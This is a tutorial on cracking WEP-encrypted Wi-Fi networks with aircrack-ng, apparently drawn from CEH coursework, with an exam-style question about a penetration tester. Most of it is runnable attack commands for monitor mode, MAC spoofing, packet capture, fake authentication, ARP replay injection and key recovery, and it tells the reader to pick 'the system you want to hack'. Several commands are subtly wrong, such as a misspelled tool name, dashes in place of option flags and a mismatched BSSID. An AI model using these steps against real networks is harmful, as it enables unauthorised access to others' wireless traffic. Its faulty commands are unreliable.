This tutorial assumes that your operating system is Linux, in any of its variants (Kali Linux, Ubuntu, etc.)
Step-by-step Procedure
1. Ensure aircrack-ng suite is installed in your computer
Open a terminal and type:
sudo apt-get update
Install aircrack-ng suite:
sudo apt-get install -y aircrack-ng
Install macchanger:
sudo apt-get install macchanger
2. Ensure you have a wireless adapter compatible with monitor mode
Open a terminal.
In order to identify connected, type the following command:
iwconfig
If your wireless adapter is external, you need to plug it. You may run iwconfig twice, before and after plugging it, so you can identify easily which is the identifier for your external wireless adapter.
In this tutorial, I assume card is wlanX (probably you will need to substitute X by a number).
Kill all processes that may conflict with the monitor mode by typing:
sudo airmon-ng check kill
Try to put your external wireless adapter in monitor mode by typing:
airmon-ng start wlanX
If you are not able to do so, probably you need to buy an external wireless adapter.
2. Put your wireless card in monitor mode
Stop monitor mode:
sudo airman-ng stop wlanX
Disconnect wirelss card:
sudo ifconfig wlanX down
Change MAC address:
sudo macchanger -—mac 00:11:22:33:44:55 wlanX
MAC address will be reestablish when you reboot your computer.
Start monitor mode:
sudo airmon-ng start wlanX
3. Scan your wireless and identify a WEP access point
Scan available access points (AP):
sudo airodump-ng wlanXmon
Press Ctrl+C to stop the scanner.
Identify the system you want to hack and note the BBSID and the channel number (CH).
For this example, CH is 00 and BBSID is XX:XX:XX:XX
4. Dump wireless packets into a file
Creates a file where all data is going to be.
airodump-ng -c 00 -w <filename.cap> —bbsid XX:XX:XX:XX:XX wlanX
Filename in this example is “wephack”
Activate acket injection:
aireplay-ng -1 0 -a <BBSID> -h <fake addr> wlanX
Inject packet and generate traffic:
aireplay-ng -3 -b <BBSID> -h <fake mac address> wlanX
5. Decrypt packets
Creates a file where all data is going to be dumped.
Open a new terminal.
Try to hack wireless key:
aircrack-ng -b 00:11:22:33:44:55 <filename.cap>
If it does not work after some minutes, run the same command again.
Password should appear on screen, between brackets.
Process Overview
To break WEP encryption the attacker follows these steps:
- Start the wireless interface in monitor mode on the specific AP channel
- In this step, the attacker sets the wireless interface to monitor mode. The interface can listen to every packet in the air. The attacker can select some packets for injection by listening to every packet available in the air.
- Test the injection capability of the wireless device to the AP
- The attacker tests whether the wireless interface is within the range of the specified AP and whether it is capable of injecting packets to it.
- Use a tool such as aireplay-ng to do a fake authentication with the AP
- The attacker ensures that the source MAC address is already associated, so that the AP accepts the injected packets. The injection will fail due to the lack of association with the AP.
- Start the Wi-Fi sniffing tool
- The attacker captures the IVs generated by using tools such as Cain & Abel and airodump-ng with a BSSID filter to collect unique IVs.
- Start a Wi-Fi packet encryption tool such as aireplay-ng in ARP request replay mode to inject packets
- To gain a large number of IVs in a short period, the attacker turns the aireplay-ng into ARP request replay mode, which listens for ARP requests and then re-injects them back into the network. The AP usually rebroadcasts packets generating a new IV. So in order to gain a large number of IVs, the attacker selects the ARP request mode.
- Run a cracking tool such as Cain & Abel or aircrack-ng
Using cracking tools such as Cain & Abel or aircrack-ng the attacker can extract WEP encryption keys from the IVs.
Example of IV injection
Kenneth, a professional penetration tester, was hired by the XYZ Company to conduct wireless network penetration testing. Kenneth proceeds with the standard steps of wireless penetration testing. He tries to collect lots of initialization vectors (IVs) using the injection method to crack the WEP key. He uses the aircrack-ng tool to capture the IVs from a specific AP. Which of the following aircrack-ng commands will help Kenneth to do this?
Command:
airodump-ng -c 9 — bssid 00:14:6C:7E:40:80 -w output ath0
WEP encryption can be cracked using Initialization Vector (IV) attack using the wesside-ng tool from the Aircrack-ng suite.
Start airodump-ng to capture the IVs: The purpose of this step is to capture the IVs generated. This step starts airodump-ng to capture the IVs from the specific AP. Open another console session to capture the generated IVs. Then enter:
airodump-ng -c 9 –bssid 00:14:6C:7E:40:80 -w output ath0
Where:
-c 9 is the channel for the wireless network
–bssid 00:14:6C:7E:40:80 is the AP MAC address. This eliminates extraneous traffic.
-w capture is file name prefix for the file which will contain the IVs.
ath0 is the interface name.
Test Wireless Device Packet Injection: The purpose of this step ensures that your card is within distance of your AP and can inject packets to it. Enter:
aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0
Where:
-9 means injection test
-e teddy is the wireless network name
-a 00:14:6C:7E:40:80 is the AP MAC address
ath0 is the wireless interface name
Start the wireless card: Enter the following command to start the wireless card on channel 9 in monitor mode:
airmon-ng start wifi0 9
Substitute the channel number that your AP runs on for “9” in the command above.
Use aireplay-ng to do a fake authentication with the AP: In order for an AP to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets.
To associate with an AP, use fake authentication:
aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0
Where:
-1 means fake authentication
0 reassociation timing in seconds
-e teddy is the wireless network name
-a 00:14:6C:7E:40:80 is the AP MAC address
-h 00:0F:B5:88:AC:82 is our card MAC address
ath0 is the wireless interface name
Hints when configuring wireless connection
Always change your SSID from the default, before you actually connect the wireless router for the access point. If an SSID broadcast is not disabled on an access point, the use of a DHCP server to automatically assign IP address to wireless clients should not be used, because war-driving tools can easily detect your internal IP addressing if the SSID broadcasts are enabled and the DHCP is being used.
You might be also interested in…
External references
- Chris Haralson; “How to: Crack WEP Encryption“
- EC-Council; “CEH v10 Coursework, Module 16: Hacking Wireless Networks, Understanding Wireless Hacking Methodology”